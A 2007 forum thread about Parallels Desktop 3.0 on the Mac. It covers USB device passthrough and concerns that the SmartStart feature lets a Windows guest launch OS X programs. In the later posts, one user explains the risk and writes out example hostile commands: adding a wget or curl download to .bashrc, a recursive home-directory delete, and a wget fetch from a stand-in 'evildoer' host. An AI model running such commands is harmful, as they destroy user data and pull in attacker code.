P3 works flawlessly

Discussion in 'Parallels Desktop for Mac' started by dkp, Jun 9, 2007.

  1. dkp

    dkp

    Messages:
    1,367
    Except for the security issue with SmartStart, Parallels 3.0 has worked perfectly for me. All I did prior to installing it was to read the documentation and make a backup of my virtual machines. All USB devices check in correctly, printing via Bonjour to my wireless HP printer is still 100%, snapshots work as expected, and I still don't like coherence but it stays out of the way.

    I've uninstalled it for now though and hope a cure for the SmartStart issue is available soon. Please bring back a decent sandbox option!! Otherwise, great job from my view of things.

    My virtual machines include:
    Solaris 10
    Sun Solaris Appliance
    Red Hat Fedora
    Windows XP
    MacBook Pro
     
  2. nanwat

    nanwat

    Messages:
    37
    How do you get XP /parallels to recognize a USB thumb drive ? I had vm running, XP open , then i inserted my thumb drive. I went to My Computers but can't see the icon there ? What did you do to get it to recognize a USB connection ? It works fine on the mac side.
     
  3. dkp

    dkp

    Messages:
    1,367
    Some hardware can be used only by OS X or by Windows, but not both at the same time. Thumb drives are in that group. If you insert a thumb drive chances are excellent OS X will grab it first. If so, eject it using the Finder. Once OS X has released it, go to Windows and use the Parallels Devices menu, select USB - in that menu you should see your thumb drive device. Select it and Windows should attach it.

    Parallels has a virtual machine editor that allows the VM to automatically grab such devices, but because I use more than one, the autograb feature doesn't work for me. It may for you, though.
     
  4. buzzdat

    buzzdat

    Messages:
    39
    With security set to high, the guest OS is cleanly isolated from the host OS. Am I missing something here? Another boneheaded security problem like silently enabling global sharing last winter?

    Not bashing, just curious. What kind of isolation do you need beyond that offered by the high security setting?
     
  5. dkp

    dkp

    Messages:
    1,367
    The SmartStart stuff continues to work no matter what you do - Windows has access to OS X applications and can launch them even if it has been deselected in Parallels Tools. I really want Windows to remain in a sandbox and have no access to my OS X environment. No SmartStart, no Global Sharing, no Local Sharing, no User Sharing, no nothing.
     
  6. buzzdat

    buzzdat

    Messages:
    39
    Think I answered my own question here. Why on earth would I want access to my OSX applications from within a Windows guest? Whose brilliant idea was that? At least give us an option to disable the darn thing!

    Wow. That's mind-numbingly stupid, IMHO. Don't think it really construes a security threat, though.
     
  7. dkp

    dkp

    Messages:
    1,367
    Imagine this scenario: You have sharing enabled, so Windows has access to your home directory. A Windows malware edits your .bashrc script and adds a wget or curl command to download some interesting code to your /var/tmp directory. Nobody in Mac land ever looks there. Then because it has access, it starts your Terminal.app proggie that uses bash for a shell, and bash executes the .bashrc file that executes the new lines of code. U R Owned!
     
  8. buzzdat

    buzzdat

    Messages:
    39
    no, I understand the issues with sharing, and have posted my opinions about that in the past - my VMs are sandboxed, isolated guests. They have no business poking about in my host machine's filesystem. My question was about the "parallels shared applications" ..feature.. and how *it* could constitute a threat. Definitely an annoying feature, especially since it cannot be turned off.
     
  9. dkp

    dkp

    Messages:
    1,367
    The demo exploit I shared is one vector but does depend on sharing. Imagine then what can happen when the API is deconstructed and a hacker can execute anything desired on the OS X side of things from Windows. For example, and I really do feel uncomfortable going beyond simple examples, bash -e "rm -r ~/*", or bash -e "wget http://evildoer.com/evilperlcode.pl".

    There is really no limit to what Parallels can pass to the OS X. It is possible to download new VM spambot appliances to OS X and launch them in Parallels, for example, and worse. Using the same mechanism a well constructed malware tool can copy your vm's to a remote site where they will be executable, and any data found there belongs to whom ever for their purposes. Actually, once taken over your entire mac and everything on it is vulnerable.
     

Share This Page